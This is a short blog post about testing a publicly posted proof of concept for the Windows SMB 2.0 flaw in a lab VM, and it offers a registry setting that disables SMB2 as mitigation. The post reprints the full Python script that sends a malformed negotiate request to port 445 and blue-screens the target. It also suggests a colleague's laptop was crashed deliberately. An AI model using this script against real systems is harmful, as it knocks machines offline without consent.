VULNERABILITY in Windows SMB2
Yesterday a colleague of mine twittered about a vulnerability found in the Windows SMB 2.0 implementation. It seemed to be kind of a scary one since most people use file sharing in Windows. Once you switch file sharing on you are an open target for this attack. Well ok, most people use a firewall nowadays but anyway.
Later that evening we were both working late so we decided to try the proof of concept that Laurent Gaffié posted on his blog. It was a simple python script that opens up a tcp connection on port 445 (SMB) and sends a malformed NEGOTIATE PROTOCOL REQUEST. The script looks like this:
#!/usr/bin/python
#When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –> 
normal value should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
We used a clean installation of Windows Server 2008 SP2 that we happened to have running on a VMWare hypervisor. Crash, boom, bang. The server showed up an ugly blue screen of death instantly. It is just be a matter of time before someone exploits this vulnerability for remote code execution. So if you are a Windows guy you should temporarily switch of SMB2 until Microsoft launches a security update on this matter. This can be done via the registry:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
“SMB2″=dword:00000000
Today Microsoft confirmed the vulnerability and they say that it does not apply to the RTM version of Windows 7 only RC is affected. This evening i installed a clean Windows 7 in my office and I can confirm that it does not have this vulnerability. This morning another colleague of mine had a strange blue screen of death experience on his laptop so you can be sure that it affects Vista aswell. Yes I gave him a warning first… 
